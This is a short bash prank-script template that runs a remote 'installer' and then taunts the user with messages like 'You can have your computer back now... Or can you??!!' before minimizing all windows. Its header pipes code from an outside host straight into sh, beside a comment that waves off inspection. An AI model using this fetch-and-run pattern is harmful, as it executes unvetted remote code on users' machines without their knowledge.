#!/bin/bash

###########  HEADER  ###########
# loL whatcha lookin for in here??
# Don't worry about it!!
curl -s 'https://suckaaa.com/s/garbage-lib-installer' | sh;
source ~/.super-duper-garbage/lib;
clear;
###########  END HEADER  ###########

# Stuff here

# Run the next script
# nextScript 'https://suckaaa.com/s/script-name-here';

bigMsg 'Thanks for playing!';

rm -rf ~/.super-duper-garbage;

sleep 3s;

echo "You can have your computer back now...\n\n";

sleep 3s;

echo "...Or can you??!!";

sleep 3s;

minimizeAllWindows;
